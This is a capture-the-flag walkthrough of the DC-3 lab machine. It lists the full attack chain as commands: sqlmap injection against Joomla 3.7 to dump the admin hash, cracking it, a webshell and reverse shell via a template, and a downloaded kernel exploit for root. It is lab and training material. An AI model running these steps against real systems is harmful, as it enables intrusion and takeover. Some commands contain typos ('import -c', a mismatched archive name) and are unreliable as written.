DC-3 Walkthrough

ifconfig -> 192.168.56.104
netdiscover -r 192.168.56.0/24 -i eth1 -> 192.168.56.110

nmap -sC -sV -T4 -A -p- 192.168.56.110
	80 Apache 2.4 (Joomla!)
192.168.56.110/README.txt -> Joomla 3.7

dirb http://192.168.56.110/

	/administrator/ is a joomla login

searchsploit joomla 3.7
searchsploit -x 42033.txt

sqlmap -u "http://192.168.56.110/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
	finds joomladb
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
	finds users table
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --dump -p list[fullordering]
	returns username + password (admin, $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu)
touch admin.hash -> put hash in it
john admin.hash -show
	snoopy

back to website -> admin/snoopy on joomla /administrator/

template -> templates -> beez3 -> new file -> upload a webshell

start a listener -> nc -lvp 12345

go to webshell page
http://192.168.56.110/templates/beez3/shell.php

boom reverse shell

sudo -l -> no tty, so lets import a python tty
import -c 'import pty; pty.spawn("/bin/bash")'

now we have bash

uname -a
Linux 4.4.0-21
lsb_release -a
Ubuntu 16.04

google ubuntu 16.04 priv esc -> 39772

cd /tmp

wget https://www.exploit-db.com/exploits/39772
unzip 39722.zip
ls
cd 39772
ls
tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput


cd root
ls
cat the-flag.txt
